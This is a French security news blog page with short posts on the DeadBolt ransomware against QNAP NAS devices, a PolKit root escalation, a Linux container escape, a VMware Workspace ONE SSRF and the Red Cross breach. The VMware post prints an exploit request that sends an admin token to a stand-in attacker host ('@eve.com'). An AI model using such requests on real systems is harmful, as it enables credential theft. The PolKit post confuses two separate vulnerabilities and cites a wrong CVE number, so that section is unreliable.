learn.hack.repeat

DeadBolt, un nouveau ransomware contre les NAS de QNAP

de

On 31/01/2022

dans Malware, Ransomware, Sécurité

QNAP a publié une déclaration invitant les utilisateurs de NAS à prendre des mesures immédiates pour éviter que leurs appareils ne soient infectés par un nouveau ransomware.

Un nouveau logiciel malveillant appelé DeadBolt a été détecté et cible les appareils NAS du fournisseur taïwanais QNAP. Le ransomware crypte les données des utilisateurs et exige une rançon de 0,03 bitcoins (environ 1 070 CHF) pour les récupérer.

Message affiché sur un appareil infecté par DeadBolt.

Le ransomware exploiterait une vulnérabilité de type 0-day inconnue du fabricant. Les développeurs de ce malware communiquent dans le message de blocage affiché après l’infection de l’appareil, qu’ils sont prêts à vendre à QNAP les détails spécifiques de cette vulnérabilité pour 5 Bitcoins (environ 171 000 euros). Ils sont également prêts à donner la clé maîtresse qui permettrait de décrypter les données de tous les appareils concernés pour 50 bitcoins.

Message des développeurs de DeadBolt à QNAP.

QNAP Systems, Inc. a émis une alerte de sécurité demandant à tous les utilisateurs de ses périphériques NAS de suivre une série d’instructions pour activer les protections de sécurité du périphérique et mettre immédiatement à jour le QTS avec la dernière version disponible.

Si le NAS est exposé à Internet et que le service de gestion du système est directement accessible depuis une adresse IP externe, les paramètres suivants sont recommandés :

  • Désactivez la fonction de transfert de port du routeur.
    Dans l’interface d’administration du routeur, dans les paramètres Serveur virtuel, NAT ou Transfert de port, désactivez l’option de transfert de port du port de service de gestion du NAS (port 8080 et 443 par défaut).
  • Désactiver la fonction de transfert de port UPnP du NAS.
    Depuis myQNAPcloud dans le menu QTS, dans la section « Auto Router Configuration », désactivez la sélection « Enable UPnP Port forwarding ».
Configuration de myQNAPcloud.

Ces mesures doivent être prises à titre préventif pour éviter l’infection par DeadBolt. Si le NAS est déjà affecté, la mise à niveau vers la dernière version ou la réinitialisation des paramètres d’usine n’éliminera pas le ransomware, comme le signalent de nombreux utilisateurs sur les forums d’assistance QNAS.

Il est recommandé d’appliquer les mises à jour et les paramètres recommandés par le fabricant pour éviter l’infection par des logiciels malveillants et la perte consécutive du contenu stocké sur le NAS.

Plus d’information:
https://www.qnap.com/en/security-news/2022/take-immediate-actions-to-stop-your-nas-from-exposing-to-the-internet-and-update-qts-to-the-latest-available-version-fight-against-ransomware-together

Un PolKit 12 ans d’âge svp!

de

On 28/01/2022

dans CVE, Sécurité

12 ans. C’est le temps pendant lequel une vulnérabilité dans PolKit (anciennement Policykit), un système de gestion des autorisations largement utilisé par les distributions Linux les plus populaires, a été cachée. La faille se trouve dans le composant ‘pkexec’, qui permet une fonctionnalité similaire à ‘sudo’, c’est-à-dire l’exécution d’une commande avec les privilèges d’un autre compte ou utilisateur. Par conséquent, lorsqu’il est exploité, il permet l’élévation des privilèges de l’utilisateur root, puisque ‘pkexec’ est un binaire SUID root.

En plus d’être présent dans presque toutes les distributions Linux, l’exploitation est triviale. Grosso modo, il suffit de manipuler uniquement les variables d’environnement pour l’effectuer. En d’autres termes, il ne s’agit pas d’un exploit typique, dans lequel il faut échapper à la protection et disposer d’un contexte d’exécution favorable, mais le succès de l’exploit est pratiquement garanti. En fait, un grand nombre d’exploits émergent pour cette vulnérabilité (avec CVE-2021-4043).

Il est intéressant de noter que la base de la faille a été décrite en 2013 dans un billet d’un chercheur australien, Ryan Mallon, qui prévenait que l’injection d’un pointeur nul dans le tableau d’arguments d’un programme pouvait avoir des conséquences désastreuses. Bien qu’il n’ait pas été en mesure à l’époque d’identifier un vecteur sur lequel appliquer son constat. Elle s’est finalement matérialisée par cette élévation de privilège, triviale à exploiter, rappelons-le.

Un article récemment publié par le chercheur en sécurité du GitHub Security Lab, Kevin Backhouse, détaille la procédure qui permet l’escalade des privilèges sur les systèmes Linux qui utilisent le service polkit.

Un attaquant non privilégié peut obtenir un shell avec l’utilisateur root en utilisant la vulnérabilité de contournement d’authentification dans le service polkit.

Bien que de nombreuses distributions Linux n’aient pas inclus la version vulnérable de polkit jusqu’à récemment, tout système Linux sur lequel est installé polkit 0.113 ou une version ultérieure est exposé à cette attaque.

La liste des distributions actuellement vulnérables partagée par Kevin Backhouse comprend des distributions populaires telles que RHEL 8, Fedora 21 (ou ultérieure), Ubuntu 20.04, ainsi que des versions instables comme Debian testing (« bullseye ») et ses dérivés.

L’exploitation de la vulnérabilité est extrêmement facile, ne nécessitant que quelques commandes de terminal utilisant uniquement des outils standard tels que bash, kill et dbus-send ; une démonstration vidéo fournie par Kevin Backhouse est incluse ci-dessous.

Lorsqu’un processus demandeur se déconnecte du service dbus juste avant que l’appel à polkit_system_bus_name_get_creds_sync soit lancé, le processus ne peut pas obtenir un uid et un pid uniques du processus et ne peut pas vérifier les privilèges du processus qui a fait la demande. La plus grande menace de cette vulnérabilité concerne la confidentialité et l’intégrité des données, ainsi que la disponibilité du système.

Plus d’information:
https://access.redhat.com/security/cve/CVE-2021-3560
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560
https://github.com/berdav/CVE-2021-4034/blob/main/cve-2021-4034.c

Une vulnérabilité dans Linux permet de s’échapper des conteneurs Kubernetes

de

On 26/01/2022

dans CVE, Sécurité

La nouvelle vulnérabilité CVE-2022-0185 dans le noyau Linux permet de prendre le contrôle du nœud tant que le conteneur a activé le privilège CAP_SYS_ADMIN.

Les mainteneurs du noyau Linux ont découvert une nouvelle vulnérabilité dans le noyau, identifiée comme CVE-2022-0185, qui pourrait être exploitée dans des environnements tels que Kubernetes pour échapper aux conteneurs et prendre le contrôle du nœud. L’exploitation de la faille nécessite que le conteneur ait la permission CAP_SYS_ADMIN activée, ce qui permet des actions telles que le montage de disques ou la définition de quotas sur le conteneur.

La vulnérabilité consiste en un sous-débit d’entier dans le composant de contexte du système de fichiers, par lequel la valeur peut être réduite en dessous de zéro et au lieu de prendre une valeur négative, atteindre la valeur maximale de l’entier. Ce bug peut être exploité pour écrire en dehors de la mémoire allouée et ainsi modifier d’autres valeurs dans l’espace.

En principe, d’autres technologies telles que Docker ne sont pas vulnérables à ce bug car seccomp est activé en standard. Cette fonctionnalité du noyau est utilisée pour restreindre les actions autorisées dans le conteneur, empêchant ainsi l’exploitation de la vulnérabilité. Cette restriction peut être testée en essayant d’exécuter ‘unshare’ sur l’instance, et vous verrez apparaître une erreur indiquant que l’opération n’est pas autorisée. En théorie, les opérateurs Kubernetes pourraient également activer seccomp par défaut, bien que cette fonctionnalité soit encore en phase de test.

La vulnérabilité a déjà été corrigée dans la version 5.16.2 de Linux, et est maintenant disponible dans la plupart des distributions telles que Redhat, Debian ou Ubuntu. La faille n’est présente qu’à partir de la version 5.1 du noyau, les versions antérieures n’ont donc pas besoin de corriger le problème. Une autre possibilité est de désactiver les espaces de noms des utilisateurs non privilégiés, pour lesquels vous pouvez utiliser : ‘sysctl -w kernel.unprivileged_userns_clone = 0’.

Pour l’instant, rien ne prouve qu’il ait été exploité par des attaquants, bien que des Proof of Concept (PoC) soient déjà disponibles et que d’autres utilisateurs les testent déjà. Le même utilisateur de Twitter a publié un repository où il promet de mettre en ligne ses résultats prochainement.

Il est recommander de mettre à jour dès que possible si vous avez des conteneurs qui utilisent la permission ‘CAP_SYS_ADMIN’. De plus, il convient généralement de ne pas accorder de permissions supplémentaires aux conteneurs, sauf si leur utilisation est vraiment nécessaire.

Plus d’information:
https://access.redhat.com/security/cve/CVE-2022-0185%0A
https://www.armosec.io/blog/cve-2022-0185-kubernetes-users/%0A
https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes

Vol de jeton JWT dans VMWare Workspace ONE Access

de

On 22/01/2022

dans CVE, Sécurité

Une vulnérabilité dans VMWare Workspace ONE Access (anciennement connu sous le nom de VMware Identity Manager), qui fournit une authentification multifactorielle à d’autres services, permet d’obtenir un jeton JWT avec des autorisations d’administrateur en exploitant un SSRF.

L’équipe de recherche d’Assetnote a découvert une vulnérabilité dans la fonction responsable de la surveillance des instances de VMWare Workspace ONE, grâce à laquelle des jetons JWT avec des autorisations d’administrateur peuvent être obtenus. La vulnérabilité exploite un SSRF (server-side request forgery), qui permet à une demande avec les informations d’identification d’être faite à un serveur contrôlé par l’attaquant.

VMWare Identity Manager, désormais connu sous le nom de Workspace ONE Access, est utilisé pour fournir une authentification multifactorielle, un accès restreint et une authentification unique aux services SaaS, aux sites Web et aux applications mobiles. Ce produit est utilisé par de multiples applications d’entreprise dans différents secteurs pour fournir une méthode d’authentification centralisée.

L’exploitation nécessite des informations d’identification d’accès au gestionnaire d’informations d’identification VMWare afin d’appeler la fonction dans ‘/SAAS/API/1.0/REST/system/health/instanceHealth’.
Ce chemin est chargé de demander la surveillance d’une des instances enregistrées dans le service. Pour ce faire, il reçoit deux paramètres : ‘hostname’ (le serveur distant à surveiller) et ‘path’ le chemin du serveur distant à appeler. Bien qu’une liste blanche vérifie que le premier appartient à l’une des instances configurées, le second n’est pas vérifié et peut être utilisé dans l’exploit. Si le code de la fonction est vérifié :

Construction de l’url à appeler depuis le VMWare Identity Manager. Source : Assetnote.

La première conditionnelle construit l’url en utilisant le ‘hostname’ et le ‘path’, et bien que dans une fonction précédente le ‘hostname’ soit vérifié (par exemple ‘bob.com’) en ne vérifiant pas si le chemin commence par un slash (‘/’) le symbole @ peut être utilisé (par exemple ‘@eve.com’) pour construire l’url ‘bob.com@eve.com’, étant ‘eve.com’ le destinataire réel de la requête. L’exemple complet de l’exploit serait : « /SAAS/API/1.0/REST/system/health/instanceHealth?hostname=bob.com&path=@eve.com ».

L’url construite à partir de la conditionnelle ci-dessus sera utilisée dans la fonction ‘getStatusFromRemoteHost’, qui fait une demande à l’url en incluant le jeton avec des autorisations d’administrateur. Si le serveur cible est contrôlé par un attaquant, comme dans l’exemple ci-dessus, l’attaquant recevra le jeton :

Fonction permettant d’obtenir l’état du serveur distant, indiquant la ligne avec le jeton à envoyer. Source : Assetnote.

La vulnérabilité a été identifiée comme étant CVE-2021-22056 avec un score de 7.5 (niveau de risque élevé). L’équipe de VMWare a publié un avis concernant cette vulnérabilité et d’autres, qui sont déjà corrigées. La vulnérabilité a été découverte le 5 octobre 2021, et résolue par VMWare le 17 décembre. Il est recommandé de mettre à jour dès que possible la dernière version disponible afin de résoudre ces problèmes.

Plus d’information:
https://blog.assetnote.io/2022/01/17/workspace-one-access-ssrf/

500 000 données personnelles compromises dans l’attaque à la Croix-Rouge

de

On 21/01/2022

dans Sécurité

L’attaque a eu lieu le 19 janvier, lorsque le serveur contenant les données a été compromis, exposant les informations d’environ 500 000 personnes à l’attaquant. Les données concernent au moins 60 sociétés internationales de la Croix-Rouge dans le monde, ce qui rend l’attaque pertinente au niveau international.

Le comité de la Croix-Rouge s’est déclaré préoccupé par l’attaque et les risques potentiels qui pourraient être déclenchés, y compris, par exemple, la publication de données confidentielles sur des sites Web publics, ce qui est particulièrement inquiétant dans la mesure où une grande partie de ces données appartiennent à des personnes vulnérables ou exclues. En même temps, une autre préoccupation majeure est que ces données pourraient être vendues, par exemple.

Selon Robert Mardini (directeur général du comité de la Croix-Rouge), on ne sait pas encore qui ou quel groupe pourrait être à l’origine de cette attaque et quelles pourraient être ses intentions. Cette attaque place les personnes vulnérables qui se trouvent dans une situation compliquée dans des positions encore plus tendues en raison de la nature même de la situation.

En effet, les informations divulguées proviennent d’un programme appelé « Rétablissement des liens familiaux », qui tente, par le biais du réseau de la Croix-Rouge, d’aider les personnes qui, en raison d’une catastrophe, d’un conflit ou d’une migration, perdent le contact avec leur famille à être réunies avec celle-ci. Mardini a donc annoncé une nouvelle fois qu’il prenait cette faille de sécurité très au sérieux.

Il a également déclaré qu’ils travaillent en étroite collaboration avec des partenaires d’autres organisations humanitaires dans le monde pour essayer de comprendre la cible de cette attaque afin qu’ils puissent prendre des mesures pour se défendre ou minimiser les dommages, car cette attaque pourrait être la première d’une longue série d’attaques contre des organisations humanitaires.

Plus d’information:
https://www.npr.org/2022/01/20/1074405423/red-cross-cyberattack?t=1642761597053
https://reliefweb.int/report/world/sophisticated-cyber-attack-targets-red-cross-red-crescent-data-500000-people

Page 18 of 28

Précédent

Suivant

Fièrement propulsé par WordPress & Thème par Anders Norén